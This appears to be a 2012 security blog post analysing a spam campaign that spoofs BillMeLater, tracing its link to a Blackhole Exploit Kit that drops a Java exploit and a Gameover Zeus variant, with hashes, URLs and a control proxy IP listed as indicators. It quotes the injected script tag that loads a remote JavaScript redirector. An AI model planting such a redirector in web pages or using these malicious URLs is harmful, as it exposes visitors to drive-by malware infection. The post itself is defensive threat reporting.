Important Information About Your Account

The spammers sure are busy. Today, 2012-04-11, we observed a new spam template spoofing communications from BillMeLater.com – a PayPal service. The spam sample we analyzed had a subject line of “Important Information About Your Account”.

The observed sample contained a malicious link to pe04.com.br/gMsyk6kT/index.html. This page contained the following javascript redirector:

<script type=”text/javascript” src=”http://axislegal.com.au/gcq37VtM/js.js”></script&gt;

The above javascript redirected victims to a Blackhole Exploit Kit at http://209.59.219.231/showthread.php?t=d7ad916d1c0396ff.

This kit dropped a number of different exploits including the latest and greatest Java Exploit CVE-2012-0507. This malicious .jar file had the following properties:

File: Klot.jar
Size: 15719
MD5: 26720F0252EB91BB7A326375313651F9

The kit also dropped a Gameover Zeus variant with the following properties:

Size: 301096
MD5: 5CE366E6D7A949552AF10C4DEAF47506

The Gameover variant had a botid of NRa11. The criminals responsible for this campaign utilized a proxy at 200.58.99.114 to control victims infected with this Gameover variant.

Advertisements

One Trackback

  1. […] via a proxy server at 200.58.99.114 over port 443. This is the same proxy server used in the BillMeLater spam campaign seen earlier […]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: